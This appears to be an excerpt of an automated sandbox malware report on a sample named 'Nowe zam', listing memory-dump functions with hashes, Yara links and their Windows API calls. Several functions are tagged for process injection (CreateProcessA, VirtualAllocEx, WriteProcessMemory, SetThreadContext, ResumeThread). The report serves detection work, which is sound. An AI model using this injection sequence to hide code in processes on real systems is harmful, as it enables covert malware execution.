Instruction ID: b03b0bffa67550f9fbbbb8ab3f4c641e69b8d81a25c82528a6fcb5dbb365c033
Opcode Fuzzy Hash: 892cb3b9a337dc0c5f0e848b9a6c2597a2ce6a80d32b2d239ff45dd907b53fe1
Instruction Fuzzy Hash: FEC1AE32B027008FEB29DB75C8507AEB7F6AFC9701F14886DE5498B295DB35E901CB52

Function 050F8BE0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9115246461b00590a2b240596f21e19023ad7d4b48dccae2f9c0954d65a1aba
Instruction ID: d195d1016e3b42ba62e7f6b32b94bd3fa709222e30f29d19a2f91a63433ce97b
Opcode Fuzzy Hash: b9115246461b00590a2b240596f21e19023ad7d4b48dccae2f9c0954d65a1aba
Instruction Fuzzy Hash: 3B518F75E016199FDF14CFEAD9446EEBBB2FF88300F10C12AE919AB254D7345A46CB50

Function 050FC0C1 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78638108d37eca7e04bc309fa86134dfc7baf7c5cb1b5b41fe1f13f94e543922
Instruction ID: 8975d4985453f0e6e705585f2a7abaf3c3a05280be34820c0990ea2498cc4e3b
Opcode Fuzzy Hash: 78638108d37eca7e04bc309fa86134dfc7baf7c5cb1b5b41fe1f13f94e543922
Instruction Fuzzy Hash: B7412974E0D2088FEB08CFAAE4456EEBBF6BF8E301F18D06AE519A7651D7345941CB50

Function 050F8BDE Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e857d9153a92cc590f26901b2652cfeb1dc23d21fea40f66efbc4cf25a0dabd
Instruction ID: 01a6294a0a1793dbce322c5fe874c05dd0b2fd3296c9daecae532bb7035251aa
Opcode Fuzzy Hash: 0e857d9153a92cc590f26901b2652cfeb1dc23d21fea40f66efbc4cf25a0dabd
Instruction Fuzzy Hash: 69419371E006199FEB08CFEAD9846EEFBF6AF88300F14C02AD519AB254D7345946CF50

Function 090D48EA Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 731baaae7c90bbf1835934776eadc09abf6266c26912934e9cb97f9d13e27d46
Instruction ID: 8a65c1cef02954c0c15754095d38336f5578e3d716bfe74414164f4d02b61d3b
Opcode Fuzzy Hash: 731baaae7c90bbf1835934776eadc09abf6266c26912934e9cb97f9d13e27d46
Instruction Fuzzy Hash: 88D0E23488F308CBCB108FA8C0855FCBBB8AB0A390F002964D40EA32A2CB30C9858E00

Function 090D1EB8 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090D20F6

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5055062ebf987902f198a0614d220c947fc9f529e92a797f3c6dd63be1b18f4f
Instruction ID: 08666561c6c9aff18e36ce9c209ecdc53ae8a9cbb4449232603eb9a25995158a
Opcode Fuzzy Hash: 5055062ebf987902f198a0614d220c947fc9f529e92a797f3c6dd63be1b18f4f
Instruction Fuzzy Hash: 6A915971D01319DFEB54DFA8C841BDDBBB2BF48310F1489AAE818A7250DB749985CF91

Function 090D1EC0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090D20F6

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8c307c36cc5b88a4a4e4b366140fe0d5f2489b36629fa5602fd1a71cb08dfd96
Instruction ID: 20db890c06e2bfa722de36e39446cc64279beb9292987209f6c23d5497decbeb
Opcode Fuzzy Hash: 8c307c36cc5b88a4a4e4b366140fe0d5f2489b36629fa5602fd1a71cb08dfd96
Instruction Fuzzy Hash: A5914971D01319DFEB64DFA8C841BEDBBB2BF48310F1485AAE818A7250DB749985CF91

Function 0097B138 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0097B39E

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4e34eef4d914e2cd8ea508a4a254feeeaa7f04f326b4f83aaffdcb0cd71aa67e
Instruction ID: b03e227a3d50e2544b98e7298b1cd98cf75a7a28567f97b45d336e6c4a5976e9
Opcode Fuzzy Hash: 4e34eef4d914e2cd8ea508a4a254feeeaa7f04f326b4f83aaffdcb0cd71aa67e
Instruction Fuzzy Hash: 6B818671A01B058FDB24CF29C45579ABBF5FF88300F008A2DE49ADBA51D735E80ACB90

Function 009758EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009759A9

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b69c1ef5c3872edfca2b10b9f03f35c94b2a15c2e7ad7c5a487580850200b37f
Instruction ID: ca08f10f3f47b6199cddff24a4f31ae7c76ac9510eaae9f1819fe21187c21aba
Opcode Fuzzy Hash: b69c1ef5c3872edfca2b10b9f03f35c94b2a15c2e7ad7c5a487580850200b37f
Instruction Fuzzy Hash: 9641D271C0071DCBEB24DFA9C984BCDBBB5BF88714F24816AD408AB251D7B56946CF90

Function 009744C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 009759A9

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8e775e364bf777d75598ecbe95e9869e11e0a27a2ac5ddced948665a03b08838
Instruction ID: 27a0cb0a0ef93e0bedc49c2729744ffe1c646f9858fd626cb3340b4865259aaf
Opcode Fuzzy Hash: 8e775e364bf777d75598ecbe95e9869e11e0a27a2ac5ddced948665a03b08838
Instruction Fuzzy Hash: E141F171C00B1DCBEB24DFA9C884B8DBBB5BF88304F20816AD408BB251DBB56945CF90

Function 090D1C38 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090D1CC8

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fd347e09db9186b7e8e68f7c8af11c6ebda07f17137becc5f41d22122f19ef6d
Instruction ID: 7f2b67a1039e78a144da89d25fdb2eee2b8e16021d0805298e84fc94aaa53ea6
Opcode Fuzzy Hash: fd347e09db9186b7e8e68f7c8af11c6ebda07f17137becc5f41d22122f19ef6d
Instruction Fuzzy Hash: AE213971900349DFDB50DFA9D984BEEBBF5FF48310F10882AE918A7240D7789954CBA0

Function 090D1C36 Relevance: 1.6, APIs: 1, Instructions: 67
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 090D1CC8

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 44a8f8054c2f84b2da0413b4df2bc8ee51ff0522f50817f9c3507a5c5e794cb1
Instruction ID: 54548fe1f9ae91a07bc985c1db71703bdba269e92f23958eb1bdd3b2075bbe08
Opcode Fuzzy Hash: 44a8f8054c2f84b2da0413b4df2bc8ee51ff0522f50817f9c3507a5c5e794cb1
Instruction Fuzzy Hash: EF2123B5900309CFDB50DFA9D984BEEBBF1FF48310F10882AE918A7240D7789954CBA0

Function 0097B128 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D7CF

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8a2eb778c89e4b39242e62be99e93beb93bc896c9f10a91a2d014cd7ef2931db
Instruction ID: 485368c84708eca24cb19cbecb548dde41145f8b1a9a322278f2ea079a816853
Opcode Fuzzy Hash: 8a2eb778c89e4b39242e62be99e93beb93bc896c9f10a91a2d014cd7ef2931db
Instruction Fuzzy Hash: F021E5B590124CDFDB10DFA9D584ADEBBF4FB48310F14841AE918A3350D378A954CFA5

Function 0097D742 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D7CF

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fb683f96f4c8b0d9016b659c383fe5a802d277e6d9f74d2085096bf74c1f192b
Instruction ID: 0051fadc8cd335689eeb2e22704a2f874c490f10ca2da73cf3fd3640e78e66b3
Opcode Fuzzy Hash: fb683f96f4c8b0d9016b659c383fe5a802d277e6d9f74d2085096bf74c1f192b
Instruction Fuzzy Hash: E121E0B5901248DFDB10CFAAD984ADEBFF4FB48320F14805AE918A7250D379A955CFA1

Function 090D1D28 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090D1DA8

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0e7ce8169166e917e7c397b77a32dc171242da9399c2b05016c663e77f60117f
Instruction ID: a0bfc03cb33f06ed09f0e7a3f1e297b8199ec7d194c32d38763eadff09ddffb0
Opcode Fuzzy Hash: 0e7ce8169166e917e7c397b77a32dc171242da9399c2b05016c663e77f60117f
Instruction Fuzzy Hash: D5215971C003099FDB10DFAAC884BDEBBF5FF48310F10852AE518A7240C7389904CBA1

Function 090D1D23 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 090D1DA8

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2ac5422c653e4d93504fd6ceb49afcdaddfdf2bf6089c958da4227ba09e76c67
Instruction ID: 5afd4ab81730ad6c7933d239bb55727b4e82a7fb0d5aff2ae4ec16b2362679c4
Opcode Fuzzy Hash: 2ac5422c653e4d93504fd6ceb49afcdaddfdf2bf6089c958da4227ba09e76c67
Instruction Fuzzy Hash: D1213471D013098FDB10DFA9D984AEEBBF5FF88310F10892AE519A7240C7399905CBA1

Function 090D1AA0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 090D1B1E

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 305df1ecc2b3480faa45966f2f6ba1ba6b9a2ede47325f1846defcdc001326e0
Instruction ID: d55064a577612f505e0cd511bf45afda1369920296be323b6d2357467a410ae5
Opcode Fuzzy Hash: 305df1ecc2b3480faa45966f2f6ba1ba6b9a2ede47325f1846defcdc001326e0
Instruction Fuzzy Hash: 2C215B71D003098FDB50DFAAC4847EEBBF4EF88314F14842AE519A7240DB789945CFA5

Function 090D1A9C Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 090D1B1E

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c73a04c6ef25890f892f9f3114747aea13b147e7bd14339762d8e2eed8873776
Instruction ID: 97c81e43619547d6db9fce7a6a8ff7ac46b450fd00fb80a21fa5bb970b3c197a
Opcode Fuzzy Hash: c73a04c6ef25890f892f9f3114747aea13b147e7bd14339762d8e2eed8873776
Instruction Fuzzy Hash: 36218871D003098FEB50DFA9C4847EEBBF1AF48310F10882AE519A7240DB789949CFA0

Function 090D1B78 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090D1BE6

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2ff9273f2bf1e67e10f205a086ed947f3561938977a409d4172a5272c43c8936
Instruction ID: b9c7c51c095a7a75e13754aa2bdc05986698a2d22d594b9dcbdc341aca2de530
Opcode Fuzzy Hash: 2ff9273f2bf1e67e10f205a086ed947f3561938977a409d4172a5272c43c8936
Instruction Fuzzy Hash: B31167758003098FDB10DFAAD844BDFBBF5AF88320F10881AE515A7250CB79A944CFA0

Function 090D19EB Relevance: 1.6, APIs: 1, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 090D1A52

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3f4a874df3672da7a790a4d953344c0b03dea770ba95a155803ad18d43a69279
Instruction ID: b694dedc8d66ef2b49489e06861a8a3893461d92f9c646b0b388c3e4bce5b326
Opcode Fuzzy Hash: 3f4a874df3672da7a790a4d953344c0b03dea770ba95a155803ad18d43a69279
Instruction Fuzzy Hash: 8F115871D003498FEB14DFAAD8447DEBBF4AF88310F14881AD519A7240DB79A944CB91

Function 090D1B76 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 090D1BE6

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 700a1fc6e0e026bb1dad7f43150f93ab879098f4857621935722431285a16e96
Instruction ID: 4e14de09adad83aef846ac1af125e5a499eafc989088e79c84527edc1fd463ed
Opcode Fuzzy Hash: 700a1fc6e0e026bb1dad7f43150f93ab879098f4857621935722431285a16e96
Instruction Fuzzy Hash: 79114975900309CFDB10DFA9D944BDEBBF5AF48310F14881AE515A7250C7799554CF90

Function 090D19F0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 090D1A52

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c931d714c6e64743452c16563d09c7b73ba36273a32e85b52a3cbd1d26320ede
Instruction ID: 5b1e8520f2e8e4b457ca0064ced9e0f3d449d12bc8ee3c8eeb310aab85933a13
Opcode Fuzzy Hash: c931d714c6e64743452c16563d09c7b73ba36273a32e85b52a3cbd1d26320ede
Instruction Fuzzy Hash: 39116671D003498FEB10DFAAD8447DEFBF4AF88310F14881AD519A7240CB79A944CBA0

Function 090D3538 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 090D5365

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: cdc09d5cf9185cc24457c9d6088348cab1e34a9140c14ebbe59bb2544c125c4c
Instruction ID: 81e7742e245dcffcccbc7aef2ea2ee930af4ae7d3c3dd1c84b0fb35fc42789dd
Opcode Fuzzy Hash: cdc09d5cf9185cc24457c9d6088348cab1e34a9140c14ebbe59bb2544c125c4c
Instruction Fuzzy Hash: 9011F5B5800349DFDB10DF99D984BDEBBF8EB48714F108859E918A7250D375A944CFA1

Function 0097B338 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0097B39E

Memory Dump Source

Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 53b8ab82ee5642f3ce88882064db0228e70937b988a51f5f73569dee983d75a4
Instruction ID: 96fda4789b1d0c1872a08562635e2763493e22b041c48135bacb1b9398fc8e49
Opcode Fuzzy Hash: 53b8ab82ee5642f3ce88882064db0228e70937b988a51f5f73569dee983d75a4
Instruction Fuzzy Hash: 2D1110B6C007498FDB20DF9AD444BDEFBF8AB88310F10851AD819A7210D379A545CFA5

Function 090D5300 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 090D5365

Memory Dump Source

Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0ac44d367477db41a54868de94c64ccd4b2d889c73945adfaf12e70b46ca520b
Instruction ID: 47f184751e35b03f711de01565de9357b9272bdc8d4f665ae2ec358b15f086bb
Opcode Fuzzy Hash: 0ac44d367477db41a54868de94c64ccd4b2d889c73945adfaf12e70b46ca520b
Instruction Fuzzy Hash: 3D1115B5800349CFDB10DF99D985BDEBBF4FB48320F14885AE918A7610C379A944CFA1

Function 04B19670 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

@, xrefs: 04B19847

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 107b48e76557208d52fc306234adeed43766db3a9f4a2a4a9b5a3b3f78d0b63e
Instruction ID: 6cecc20174499c67a52f10b18d9bbbeaa21a254ba539c0096819f2c4cce22018
Opcode Fuzzy Hash: 107b48e76557208d52fc306234adeed43766db3a9f4a2a4a9b5a3b3f78d0b63e
Instruction Fuzzy Hash: 85D12D7590024ACFCF14DFA8C8948EDB7B5FF58314B648659D8167B259E730BA89CF80

Function 04B19620 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

, xrefs: 04B19813

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 783ec5c7fc2eb8fe0cf2ff787fb76d645015b0f3e1e88b300f3a00cc8691a2ee
Instruction ID: 7ed48002908f7c4d82748ab96a6b5f4fc94eea05a3f27e174a91aa1536d442bb
Opcode Fuzzy Hash: 783ec5c7fc2eb8fe0cf2ff787fb76d645015b0f3e1e88b300f3a00cc8691a2ee
Instruction Fuzzy Hash: 3DB1407590024ACFCF05DFA8C8948DDB7B1FF48314B248699D815AB25ADB31F99ACF80

Function 04B13158 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

[Kn^, xrefs: 04B131CB, 04B13205

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID: [Kn^
API String ID: 0-1331738579
Opcode ID: 6ddcbdac1cd80cea0369082e33617d0ec64ac47d4204793c442156418248c56c
Instruction ID: 84fd8178ee3081012e44215067eb689518d7c40b53ae01b9822441862a6b164a
Opcode Fuzzy Hash: 6ddcbdac1cd80cea0369082e33617d0ec64ac47d4204793c442156418248c56c
Instruction Fuzzy Hash: A331F4726003048FDB01EB78D84859BBBF2EF85314714C4AAD906DB362EF75E80A8B91

Function 050FEE68 Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

8CFB, xrefs: 050FF201

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID: 8CFB
API String ID: 0-1492579572
Opcode ID: 56a17be5e22793bb774f611ebc09a590c06033e67a373df90b4bb1adfeb8c23b
Instruction ID: 0c929242346d7700aa6aae7de006e40e16352584711dfd9165f19ad356a4f6da
Opcode Fuzzy Hash: 56a17be5e22793bb774f611ebc09a590c06033e67a373df90b4bb1adfeb8c23b
Instruction Fuzzy Hash: A611E674A11209CFEB44DFA4E9959EDBBB6FB88301B508555E406AB719DBB45C06CF00

Function 04B152FA Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

V, xrefs: 04B15305

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: c8d90532458df50c3431087500ccd5ddd16c0c30bb8a12be8442e80245ed44c0
Instruction ID: 03cec509fc6fa72c4a4a35ad801fa219a7d4549f0043923a871da17e754b7f83
Opcode Fuzzy Hash: c8d90532458df50c3431087500ccd5ddd16c0c30bb8a12be8442e80245ed44c0
Instruction Fuzzy Hash: 2501C475E00609DFCB41EFA8C58589DBBF0EF49200B1585ABE859E7621E770AA45CF81

Function 04B16428 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

', xrefs: 04B163E7

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 921e6d4eee0a0ecdef21d05ba1fac6ad4af47edd984f4457bde0024e493808ec
Instruction ID: baedc4096367f9a817dbc51e1e836f92c366a8f4a21ecbe887b179382a932631
Opcode Fuzzy Hash: 921e6d4eee0a0ecdef21d05ba1fac6ad4af47edd984f4457bde0024e493808ec
Instruction Fuzzy Hash: 74F055653082808FE711CA3994A57B83BA0AFC0605B8D00E6C001CF1F3DA24F84BC3A1

Function 04B162F0 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

V, xrefs: 04B162FD

Memory Dump Source

Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 1f1e26a9180c0eb9d5218e4101012461c2b04d1aad9be39e488bb0b3cb09d4a8
Instruction ID: 6bd30ea907cd4cd3c22e16ba86d15eab365951bd3bd8d19d5d4dc0adc73e3e2e
Opcode Fuzzy Hash: 1f1e26a9180c0eb9d5218e4101012461c2b04d1aad9be39e488bb0b3cb09d4a8
Instruction Fuzzy Hash: 83E0DF353087418FD728CB28E88098A7FF1DF4934076985EAE088C7662D660FC0B8B40

Function 050FF099 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

BE, xrefs: 050FF099

Memory Dump Source

Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd

Similarity

API ID:
String ID: BE
API String ID: 0-3883797181
Opcode ID: bc07e8baeae096ffb89faa9a5c556717c11ed8acea96eb5cb8d6eededc93e9d6
Instruction ID: 3ec2cb5bef766737bbb633aac6a14077bb02bf3a576356e12137273d5519c417
Opcode Fuzzy Hash: bc07e8baeae096ffb89faa9a5c556717c11ed8acea96eb5cb8d6eededc93e9d6
Instruction Fuzzy Hash: CEE01A74E1411ACFCB90CF69E8854AEBBF6FB49300B008826E126E3614EB70A506CF00

Function 04B19E18 Relevance: .7, Instructions: 733COMMON

Download Yara Rule

